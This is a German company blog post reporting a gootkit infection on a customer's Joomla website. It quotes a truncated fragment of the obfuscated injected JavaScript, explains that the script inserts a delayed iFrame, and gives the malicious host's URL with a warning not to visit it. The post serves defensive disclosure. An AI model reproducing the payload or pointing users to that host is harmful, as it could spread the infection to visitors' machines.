Christoph S. Ackermann

Heute Nachmittag erreichte uns ein Hilfeschrei von einem unserer Kunden.

Der Desktopscanner hatte zu Recht die (nicht von uns stammende) firmeneigene Webseite als verdächtig gemeldet.

Lustigerweise hat bei der darauf folgenden Verifizierung des Alarms durch uns genau einer der einschlägigen Online-Scanner eine Bedrohung oder Infizierung erkannt – alle anderen stuften die Seite als sicher ein. In diversen JavaScript-Skripten auf der Seite präsentierte sich jedoch Code im Stile von:

/*gootkitstart*/i=0;try{grbregd=prototype;}catch(z){h=“ha“+“rCode“;f=[10,17.5,14,8.5,17,11.5,14.5,14,-25,14,9.5,19,17,0,7.5,14,9,14.5,13.5,-2,17.5,13.5,8,9.5,16,-21,-20.5,20.5

und so weiter.

 

Dies liess uns nun doch aufhorchen. Der Codeteil wurde so rasch wie möglich entfernt, jedoch zur Analyse auf github gespeichert. Jonas Baumann hat dann kurzerhand den „Algorithmus“ geknackt und mit dem Klartext geantwortet:

https://gist.github.com/2874683

Wie so üblich bei solchen Schad-Skripten, wird ein iFrame nachträglich in die Seite eingefügt – genauer mit zwei Sekunden Verzögerung.

Der Inhalt des iFrames jedoch bleibt mir schleierhaft, bei der aufgerufenen Seite (welches übrigens immer dieselbe ist: http://violet-jftqsegsse.dns-stuff.com/go.php?sid=mix -> AUSDRÜCKLICHE Warnung vor dem Besuch der Seite!!) kommt ständig einen 404-Fehler.

Hat jemand bereits ähnliche Beobachtungen gemacht?

2 responses to “Infiziertes Joomla mit gootkit

  1. Merci für den Hinweis!
    Passwörter wurden bereits geändert… Eventuell hatte der Hoster ein Leck? Bei welchem Hoster war Deine Vereinsseite hinterlegt?

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Lust auf mehr?

Eignet sich Twitter für mein Unternehmen? 12 Facts und 8 Benefits

Sarah Berger
Kurz zur Erinnerung: Die kostenlose Social Media Plattform …
Blogbeitrag ansehen

Berner Solidarität

Sarah Berger
Solidarität gehört momentan zum Schweizer Alltag, wie für …
Blogbeitrag ansehen

Freie Auffahrtstage

Fabienne Mast
Liebe Besucherin, lieber Besucher Unser Büro ist über …
Blogbeitrag ansehen